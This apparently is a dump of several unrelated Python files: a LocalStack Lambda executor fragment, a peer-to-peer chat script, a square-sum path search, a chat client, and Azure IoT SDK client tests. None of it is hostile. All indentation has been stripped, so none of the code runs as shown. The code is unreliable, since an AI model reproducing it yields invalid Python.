docker_tag = '20191117-%s' % docker_tag
return '"%s:%s"' % (docker_image, docker_tag)
@classmethod
def get_docker_remove_flag(cls):
return '--rm' if config.LAMBDA_REMOVE_CONTAINERS else ''
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ['.']
base_dir = os.path.dirname(archive)
for pattern in ['%s/*.jar', '%s/lib/*.jar', '%s/java/lib/*.jar', '%s/*.zip']:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
entries.append('*.jar')
entries.append('java/lib/*.jar')
result = ':'.join(entries)
return result
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
'local': EXECUTOR_LOCAL,
'docker': EXECUTOR_CONTAINERS_SEPARATE,
'docker-reuse': EXECUTOR_CONTAINERS_REUSE
}
|
chat.py
|
#!/usr/bin/env python3
import socket
import threading
import sys
import time
from random import randint
class Server:
connections = []
peers = []
def __init__(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', 10000))
sock.listen(1)
print("Server running...")
while True:
conn, addr = sock.accept()
cThread = threading.Thread(target=self.handler, args=(conn,addr))
cThread.daemon = True
cThread.start()
self.connections.append(conn)
self.peers.append(addr[0])
print(str(addr[0]) + ":" + str(addr[1]), "connected")
self.sendPeers()
def handler(self, conn, addr):
while True:
data = conn.recv(1024)
for connection in self.connections:
if connection != conn:
connection.send(data)
if not data:
print(str(addr[0]) + ":" + str(addr[1]), "disconnected")
self.connections.remove(conn)
self.peers.remove(addr[0])
conn.close()
self.sendPeers()
break
def sendPeers(self):
p = ""
for peer in self.peers:
p = p + peer + ","
for connection in self.connections:
connection.send(b'\x11' + bytes(p, 'utf-8'))
class Client:
username = ""
def __init__(self, address, username):
randomColor = randint(0, 6)
colorStr = color.colors[randomColor]
self.username = color.BOLD + colorStr + username + color.END
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.connect((address, 10000))
iThread = threading.Thread(target=self.sendMsg, args=(sock,))
iThread.daemon = True
iThread.start()
while True:
data = sock.recv(1024)
if not data:
break
if data[0:1] == b'\x11':
self.updatePeers(data[1:])
else:
print(str(data, 'utf-8'))
def sendMsg(self, sock):
while True:
message = self.username
message = message + ": " + input("")
sock.send(bytes(message, 'utf-8'))
def updatePeers(self, peerData):
p2p.peers = str(peerData, 'utf-8').split(",")[:-1]
class p2p:
peers = ['127.0.0.1']
class color:
colors = [
'\033[95m', # Purple
'\033[96m', # Cyan
'\033[36m', # Dark Cyan
'\033[94m', # Blue
'\033[92m', # Green
'\033[93m', # Yellow
'\033[91m'] # Red
BOLD = '\033[1m'
END = '\033[0m'
username = ""
if (len(sys.argv) == 2):
username = sys.argv[1]
print("Hello, " + username)
while True:
try:
print("Trying to connect...")
time.sleep(randint(1, 5))
for peer in p2p.peers:
try:
client = Client(peer, username)
except KeyboardInterrupt:
sys.exit(0)
except:
pass
if randint(1, 5) == 1:
try:
server = Server()
except KeyboardInterrupt:
sys.exit(0)
except:
print("Couldn't start the server...")
except KeyboardInterrupt:
sys.exit(0)
|
square_sum_recursion_all_variants.py
|
# This variant of the program will show every single possible way to complete a Square-Sum Hamiltonian Path
# with the chosen number.
# Note that half of these are just the reverse of the other half.
import threading
import time
from timeit import default_timer as timer
print("Choose length:")
count = int(input())
sqnum = list()
start = timer()
confirmed = list()
printed = list()
active = [True]
new = [False]
li = [i for i in range(count, 0, -1)]
for i in range(count, 1, -1):
if i ** 2 < count * 2:
sqnum.append(i ** 2)
def squareSum(i):
seq = i
if len(seq) == count or not active[0]:
confirmed.append(seq)
new[0] = True
return
for s in sqnum:
n = s - seq[-1]
if 0 < n <= count and n not in seq:
squareSum(seq + [n])
def check(confirmed):
if len(confirmed):
if new[0]:
for seq in range(len(printed), len(confirmed)):
print(confirmed[seq])
printed.append(confirmed[seq])
for number in li:
thread = threading.Thread(target=squareSum, args=([number],)).start()
check(confirmed)
while len(threading.enumerate()) > 1:
check(confirmed)
time.sleep(1)
if len(confirmed) == 0:
print("No solution was found")
else:
c = len(list(set(map(tuple, confirmed))))
print("Found %d solutions. That's %d excluding mirror duplicates." % (c, c / 2))
print(str(timer() - start), "sec runtime")
|
client.py
|
import socket
import random
from threading import Thread
from datetime import datetime
from colorama import Fore, init, Back
# init colors
init()
# set the available colors
colors = [Fore.BLUE, Fore.CYAN, Fore.GREEN, Fore.LIGHTBLACK_EX,
Fore.LIGHTBLUE_EX, Fore.LIGHTCYAN_EX, Fore.LIGHTGREEN_EX,
Fore.LIGHTMAGENTA_EX, Fore.LIGHTRED_EX, Fore.LIGHTWHITE_EX,
Fore.LIGHTYELLOW_EX, Fore.MAGENTA, Fore.RED, Fore.WHITE, Fore.YELLOW
]
# choose a random color for the client
client_color = random.choice(colors)
# server's IP address
# if the server is not on this machine,
# put the private (network) IP address (e.g 192.168.1.2)
SERVER_HOST = "127.0.0.1"
SERVER_PORT = 5002 # server's port
separator_token = "<SEP>" # we will use this to separate the client name & message
# initialize TCP socket
s = socket.socket()
print(f"[*] Connecting to {SERVER_HOST}:{SERVER_PORT}...")
# connect to the server
s.connect((SERVER_HOST, SERVER_PORT))
print("[+] Connected.")
# prompt the client for a name
name = input("Enter your name: ")
def listen_for_messages():
while True:
message = s.recv(1024).decode()
print("\n" + message)
# make a thread that listens for messages to this client & print them
t = Thread(target=listen_for_messages)
# make the thread daemon so it ends whenever the main thread ends
t.daemon = True
# start the thread
t.start()
while True:
# input message we want to send to the server
to_send = input()
# a way to exit the program
if to_send.lower() == 'q':
break
# add the datetime, name & the color of the sender
date_now = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
to_send = f"{client_color}[{date_now}] {name}{separator_token}{to_send}{Fore.RESET}"
# finally, send the message
s.send(to_send.encode())
# close the socket
s.close()
|
test_sync_clients.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from azure.iot.device.common.pipeline.pipeline_exceptions import OperationCancelled
from azure.iot.device.common.evented_callback import EventedCallback
import pytest
import logging
import threading
import time
import os
import io
import six
import six.moves.urllib as urllib
from azure.iot.device.iothub import IoTHubDeviceClient, IoTHubModuleClient
from azure.iot.device import exceptions as client_exceptions
from azure.iot.device.common.auth import sastoken as st
from azure.iot.device.iothub.pipeline import constant as pipeline_constant
from azure.iot.device.iothub.pipeline import exceptions as pipeline_exceptions
from azure.iot.device.iothub.pipeline import IoTHubPipelineConfig
from azure.iot.device.iothub.models import Message, MethodRequest
from azure.iot.device.iothub.sync_inbox import SyncClientInbox
from azure.iot.device.iothub.abstract_clients import (
RECEIVE_TYPE_NONE_SET,
RECEIVE_TYPE_HANDLER,
RECEIVE_TYPE_API,
)
from azure.iot.device import constant as device_constant
from .shared_client_tests import (
SharedIoTHubClientInstantiationTests,
SharedIoTHubClientPROPERTYHandlerTests,
SharedIoTHubClientPROPERTYReceiverHandlerTests,
SharedIoTHubClientPROPERTYConnectedTests,
SharedIoTHubClientOCCURRENCEConnectTests,
SharedIoTHubClientOCCURRENCEDisconnectTests,
SharedIoTHubClientOCCURRENCENewSastokenRequired,
SharedIoTHubClientCreateFromConnectionStringTests,
SharedIoTHubDeviceClientCreateFromSymmetricKeyTests,
SharedIoTHubDeviceClientCreateFromSastokenTests,
SharedIoTHubDeviceClientCreateFromX509CertificateTests,
SharedIoTHubModuleClientCreateFromX509CertificateTests,
SharedIoTHubModuleClientCreateFromSastokenTests,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnvTests,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnvTests,
)
logging.basicConfig(level=logging.DEBUG)
##################
# INFRASTRUCTURE #
##################
# TODO: now that there are EventedCallbacks, tests should be updated to test their use
# (which is much simpler than this infrastructure)
class WaitsForEventCompletion(object):
def add_event_completion_checks(self, mocker, pipeline_function, args=[], kwargs={}):
event_init_mock = mocker.patch.object(threading, "Event")
event_mock = event_init_mock.return_value
def check_callback_completes_event():
# Assert exactly one Event was instantiated so we know the following asserts
# are related to the code under test ONLY
assert event_init_mock.call_count == 1
# Assert waiting for Event to complete
assert event_mock.wait.call_count == 1
assert event_mock.set.call_count == 0
# Manually trigger callback
cb = pipeline_function.call_args[1]["callback"]
cb(*args, **kwargs)
# Assert Event is now completed
assert event_mock.set.call_count == 1
event_mock.wait.side_effect = check_callback_completes_event
##########################
# SHARED CLIENT FIXTURES #
##########################
@pytest.fixture
def handler():
def _handler_function(arg):
pass
return _handler_function
#######################
# SHARED CLIENT TESTS #
#######################
class SharedClientShutdownTests(WaitsForEventCompletion):
@pytest.mark.it("Performs a client disconnect (and everything that entails)")
def test_calls_disconnect(self, mocker, client):
# We merely check that disconnect is called here. Doing so does several things, which
# are covered by the disconnect tests themselves. Those tests will NOT be duplicated here
client.disconnect = mocker.MagicMock()
assert client.disconnect.call_count == 0
client.shutdown()
assert client.disconnect.call_count == 1
@pytest.mark.it("Begins a 'shutdown' pipeline operation")
def test_calls_pipeline_shutdown(self, mocker, client, mqtt_pipeline):
# mock out implicit disconnect
client.disconnect = mocker.MagicMock()
client.shutdown()
assert mqtt_pipeline.shutdown.call_count == 1
@pytest.mark.it(
"Waits for the completion of the 'shutdown' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.shutdown
)
# mock out implicit disconnect
client_manual_cb.disconnect = mocker.MagicMock()
client_manual_cb.shutdown()
@pytest.mark.it(
"Raises a client error if the `shutdown` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
# The only other expected errors are unexpected ones.
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
# mock out implicit disconnect
client_manual_cb.disconnect = mocker.MagicMock()
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.shutdown,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.shutdown()
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Stops the client event handlers after the `shutdown` pipeline operation is complete"
)
def test_stops_client_event_handlers(self, mocker, client, mqtt_pipeline):
# mock out implicit disconnect
client.disconnect = mocker.MagicMock()
# Spy on handler manager stop. Note that while it does get called twice in shutdown, it
# only happens once here because we have mocked disconnect (where first stoppage) occurs
hm_stop_spy = mocker.spy(client._handler_manager, "stop")
def check_handlers_and_complete(callback):
assert hm_stop_spy.call_count == 0
callback()
mqtt_pipeline.shutdown.side_effect = check_handlers_and_complete
client.shutdown()
assert hm_stop_spy.call_count == 1
assert hm_stop_spy.call_args == mocker.call(receiver_handlers_only=False)
class SharedClientConnectTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'connect' pipeline operation")
def test_calls_pipeline_connect(self, client, mqtt_pipeline):
client.connect()
assert mqtt_pipeline.connect.call_count == 1
@pytest.mark.it("Waits for the completion of the 'connect' pipeline operation before returning")
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.connect
)
client_manual_cb.connect()
@pytest.mark.it(
"Raises a client error if the `connect` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.TlsExchangeAuthError,
client_exceptions.ClientError,
id="TlsExchangeAuthError->ClientError",
),
pytest.param(
pipeline_exceptions.ProtocolProxyError,
client_exceptions.ClientError,
id="ProtocolProxyError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.connect,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.connect()
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientDisconnectTests(WaitsForEventCompletion):
@pytest.mark.it(
"Runs a 'disconnect' pipeline operation, stops the receiver handlers, then runs a second 'disconnect' pipeline operation"
)
def test_calls_pipeline_disconnect(self, mocker, client, mqtt_pipeline):
manager_mock = mocker.MagicMock()
client._handler_manager = mocker.MagicMock()
manager_mock.attach_mock(mqtt_pipeline.disconnect, "disconnect")
manager_mock.attach_mock(client._handler_manager.stop, "stop")
client.disconnect()
assert mqtt_pipeline.disconnect.call_count == 2
assert client._handler_manager.stop.call_count == 1
assert manager_mock.mock_calls == [
mocker.call.disconnect(callback=mocker.ANY),
mocker.call.stop(receiver_handlers_only=True),
mocker.call.disconnect(callback=mocker.ANY),
]
@pytest.mark.it(
"Waits for the completion of both 'disconnect' pipeline operations before returning"
)
def test_waits_for_pipeline_op_completion(self, mocker, client, mqtt_pipeline):
cb_mock1 = mocker.MagicMock()
cb_mock2 = mocker.MagicMock()
mocker.patch("azure.iot.device.iothub.sync_clients.EventedCallback").side_effect = [
cb_mock1,
cb_mock2,
]
client.disconnect()
# Disconnect called twice
assert mqtt_pipeline.disconnect.call_count == 2
# Assert callbacks sent to pipeline
assert mqtt_pipeline.disconnect.call_args_list[0][1]["callback"] is cb_mock1
assert mqtt_pipeline.disconnect.call_args_list[1][1]["callback"] is cb_mock2
# Assert callback completions were waited upon
assert cb_mock1.wait_for_completion.call_count == 1
assert cb_mock2.wait_for_completion.call_count == 1
@pytest.mark.it(
"Raises a client error if the `disconnect` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.disconnect,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.disconnect()
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientUpdateSasTokenTests(WaitsForEventCompletion):
# NOTE: Classes that inherit from this class must define some additional fixtures not included
# here, which will be specific to a device or module:
# - sas_config: returns an IoTHubPipelineConfiguration configured for Device/Module
# - uri: A uri that matches the uri in the SAS from sas_token_string fixture
# - nonmatching_uri: A uri that does NOT match to the uri in the SAS from sas_token_string
# - invalid_uri: A uri that is invalid (poorly formed, missing data, etc.)
@pytest.fixture
def device_id(self, sas_token_string):
# NOTE: This is kind of unconventional, but this is the easiest way to extract the
# device id from a sastoken string
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
device_id = token_uri_pieces[2]
return device_id
@pytest.fixture
def hostname(self, sas_token_string):
# NOTE: This is kind of unconventional, but this is the easiest way to extract the
# hostname from a sastoken string
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
hostname = token_uri_pieces[0]
return hostname
@pytest.fixture
def sas_client(self, client_class, mqtt_pipeline, http_pipeline, sas_config):
"""Client configured as if using user-provided, non-renewable SAS auth"""
mqtt_pipeline.pipeline_configuration = sas_config
http_pipeline.pipeline_configuration = sas_config
return client_class(mqtt_pipeline, http_pipeline)
@pytest.fixture
def sas_client_manual_cb(
self, client_class, mqtt_pipeline_manual_cb, http_pipeline_manual_cb, sas_config
):
mqtt_pipeline_manual_cb.pipeline_configuration = sas_config
http_pipeline_manual_cb.pipeline_configuration = sas_config
return client_class(mqtt_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def new_sas_token_string(self, uri):
# New SASToken String that matches old device id and hostname
signature = "AvCQCS7uVk8Lxau7rBs/jek4iwENIwLwpEV7NIJySc0="
new_token_string = "SharedAccessSignature sr={uri}&sig={signature}&se={expiry}".format(
uri=urllib.parse.quote(uri, safe=""),
signature=urllib.parse.quote(signature, safe=""),
expiry=int(time.time()) + 3600,
)
return new_token_string
@pytest.mark.it(
"Creates a new NonRenewableSasToken and sets it on the PipelineConfig, if the new SAS Token string matches the existing SAS Token's information"
)
def test_updates_token_if_match_vals(self, sas_client, new_sas_token_string):
old_sas_token_string = str(sas_client._mqtt_pipeline.pipeline_configuration.sastoken)
# Update to new token
sas_client.update_sastoken(new_sas_token_string)
# Sastoken was updated
assert (
str(sas_client._mqtt_pipeline.pipeline_configuration.sastoken) == new_sas_token_string
)
assert (
str(sas_client._mqtt_pipeline.pipeline_configuration.sastoken) != old_sas_token_string
)
@pytest.mark.it("Begins a 'reauthorize connection' pipeline operation")
def test_calls_pipeline_reauthorize(self, sas_client, new_sas_token_string, mqtt_pipeline):
sas_client.update_sastoken(new_sas_token_string)
assert mqtt_pipeline.reauthorize_connection.call_count == 1
@pytest.mark.it(
"Waits for the completion of the 'reauthorize connection' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, sas_client_manual_cb, mqtt_pipeline_manual_cb, new_sas_token_string
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.reauthorize_connection
)
sas_client_manual_cb.update_sastoken(new_sas_token_string)
@pytest.mark.it(
"Raises a ClientError if the 'reauthorize connection' pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
sas_client_manual_cb,
mqtt_pipeline_manual_cb,
new_sas_token_string,
client_error,
pipeline_error,
):
# NOTE: If/When the MQTT pipeline is updated so that the reauthorize op waits for
# reconnection in order to return (currently it just waits for the disconnect),
# there will need to be additional connect-related errors in the parametrization.
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.reauthorize_connection,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
sas_client_manual_cb.update_sastoken(new_sas_token_string)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Raises a ClientError if the client was created with an X509 certificate instead of SAS"
)
def test_created_with_x509(self, mocker, sas_client, new_sas_token_string):
# Modify client to seem as if created with X509
x509_client = sas_client
x509_client._mqtt_pipeline.pipeline_configuration.sastoken = None
x509_client._mqtt_pipeline.pipeline_configuration.x509 = mocker.MagicMock()
with pytest.raises(client_exceptions.ClientError):
x509_client.update_sastoken(new_sas_token_string)
@pytest.mark.it(
"Raises a ClientError if the client was created with a renewable, non-user provided SAS (e.g. from connection string, symmetric key, etc.)"
)
def test_created_with_renewable_sas(self, mocker, uri, sas_client, new_sas_token_string):
# Modify client to seem as if created with renewable SAS
mock_signing_mechanism = mocker.MagicMock()
mock_signing_mechanism.sign.return_value = "ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI="
renewable_token = st.RenewableSasToken(uri, mock_signing_mechanism)
sas_client._mqtt_pipeline.pipeline_configuration.sastoken = renewable_token
# Client fails
with pytest.raises(client_exceptions.ClientError):
sas_client.update_sastoken(new_sas_token_string)
@pytest.mark.it("Raises a ValueError if there is an error creating a new NonRenewableSasToken")
def test_token_error(self, mocker, sas_client, new_sas_token_string):
# NOTE: specific inputs that could cause this are tested in the sastoken test module
sastoken_mock = mocker.patch.object(st.NonRenewableSasToken, "__init__")
token_err = st.SasTokenError("Some SasToken failure")
sastoken_mock.side_effect = token_err
with pytest.raises(ValueError) as e_info:
sas_client.update_sastoken(new_sas_token_string)
assert e_info.value.__cause__ is token_err
@pytest.mark.it("Raises ValueError if the provided SAS token string has already expired")
def test_expired_token(self, mocker, uri, sas_client, hostname, device_id):
sastoken_str = "SharedAccessSignature sr={resource}&sig={signature}&se={expiry}".format(
resource=urllib.parse.quote(uri, safe=""),
signature=urllib.parse.quote("ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI=", safe=""),
expiry=int(time.time() - 3600), # expired
)
with pytest.raises(ValueError):
sas_client.update_sastoken(sastoken_str)
@pytest.mark.it(
"Raises ValueError if the provided SAS token string does not match the previous SAS details"
)
def test_nonmatching_uri_in_new_token(self, sas_client, nonmatching_uri):
signature = "AvCQCS7uVk8Lxau7rBs/jek4iwENIwLwpEV7NIJySc0="
sastoken_str = "SharedAccessSignature sr={uri}&sig={signature}&se={expiry}".format(
uri=urllib.parse.quote(nonmatching_uri, safe=""),
signature=urllib.parse.quote(signature),
expiry=int(time.time()) + 3600,
)
with pytest.raises(ValueError):
sas_client.update_sastoken(sastoken_str)
@pytest.mark.it("Raises ValueError if the provided SAS token string has an invalid URI")
def test_raises_value_error_invalid_uri(self, mocker, sas_client, invalid_uri):
sastoken_str = "SharedAccessSignature sr={resource}&sig={signature}&se={expiry}".format(
resource=urllib.parse.quote(invalid_uri, safe=""),
signature=urllib.parse.quote("ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI=", safe=""),
expiry=int(time.time() + 3600),
)
with pytest.raises(ValueError):
sas_client.update_sastoken(sastoken_str)
class SharedClientSendD2CMessageTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_message' MQTTPipeline operation")
def test_calls_pipeline_send_message(self, client, mqtt_pipeline, message):
client.send_message(message)
assert mqtt_pipeline.send_message.call_count == 1
assert mqtt_pipeline.send_message.call_args[0][0] is message
@pytest.mark.it(
"Waits for the completion of the 'send_message' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, message
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.send_message
)
client_manual_cb.send_message(message)
@pytest.mark.it(
"Raises a client error if the `send_message` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.NoConnectionError,
client_exceptions.NoConnectionError,
id="NoConnectionError->NoConnectionError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
message,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.send_message,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.send_message(message)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Wraps 'message' input parameter in a Message object if it is not a Message object"
)
@pytest.mark.parametrize(
"message_input",
[
pytest.param("message", id="String input"),
pytest.param(222, id="Integer input"),
pytest.param(object(), id="Object input"),
pytest.param(None, id="None input"),
pytest.param([1, "str"], id="List input"),
pytest.param({"a": 2}, id="Dictionary input"),
],
)
def test_wraps_data_in_message_and_calls_pipeline_send_message(
self, client, mqtt_pipeline, message_input
):
client.send_message(message_input)
assert mqtt_pipeline.send_message.call_count == 1
sent_message = mqtt_pipeline.send_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == message_input
@pytest.mark.it("Raises error when message data size is greater than 256 KB")
def test_raises_error_when_message_data_greater_than_256(self, client, mqtt_pipeline):
data_input = "serpensortia" * 25600
message = Message(data_input)
with pytest.raises(ValueError) as e_info:
client.send_message(message)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_message.call_count == 0
@pytest.mark.it("Raises error when message size is greater than 256 KB")
def test_raises_error_when_message_size_greater_than_256(self, client, mqtt_pipeline):
data_input = "serpensortia"
message = Message(data_input)
message.custom_properties["spell"] = data_input * 25600
with pytest.raises(ValueError) as e_info:
client.send_message(message)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_message.call_count == 0
@pytest.mark.it("Does not raises error when message data size is equal to 256 KB")
def test_raises_error_when_message_data_equal_to_256(self, client, mqtt_pipeline):
data_input = "a" * 262095
message = Message(data_input)
# This check was put as message class may undergo the default content type encoding change
# and the above calculation will change.
# Had to do greater than check for python 2. Ideally should be not equal check
if message.get_size() > device_constant.TELEMETRY_MESSAGE_SIZE_LIMIT:
assert False
client.send_message(message)
assert mqtt_pipeline.send_message.call_count == 1
sent_message = mqtt_pipeline.send_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == data_input
class SharedClientReceiveMethodRequestTests(object):
@pytest.mark.it("Implicitly enables methods feature if not already enabled")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_enables_methods_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline, method_name
):
mocker.patch.object(SyncClientInbox, "get") # patch this receive_method_request won't block
# Verify Input Messaging enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
False # Method Requests will appear disabled
)
client.receive_method_request(method_name)
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.METHODS
mqtt_pipeline.enable_feature.reset_mock()
# Verify Input Messaging not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
True # Input Messages will appear enabled
)
client.receive_method_request(method_name)
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it(
"Returns a MethodRequest from the generic method inbox, if available, when called without method name"
)
def test_called_without_method_name_returns_method_request_from_generic_method_inbox(
self, mocker, client
):
request = MethodRequest(request_id="1", name="some_method", payload={"key": "value"})
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = request
manager_get_inbox_mock = mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
received_request = client.receive_method_request()
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(None)
assert inbox_mock.get.call_count == 1
assert received_request is received_request
@pytest.mark.it(
"Returns MethodRequest from the corresponding method inbox, if available, when called with a method name"
)
def test_called_with_method_name_returns_method_request_from_named_method_inbox(
self, mocker, client
):
method_name = "some_method"
request = MethodRequest(request_id="1", name=method_name, payload={"key": "value"})
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = request
manager_get_inbox_mock = mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
received_request = client.receive_method_request(method_name)
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(method_name)
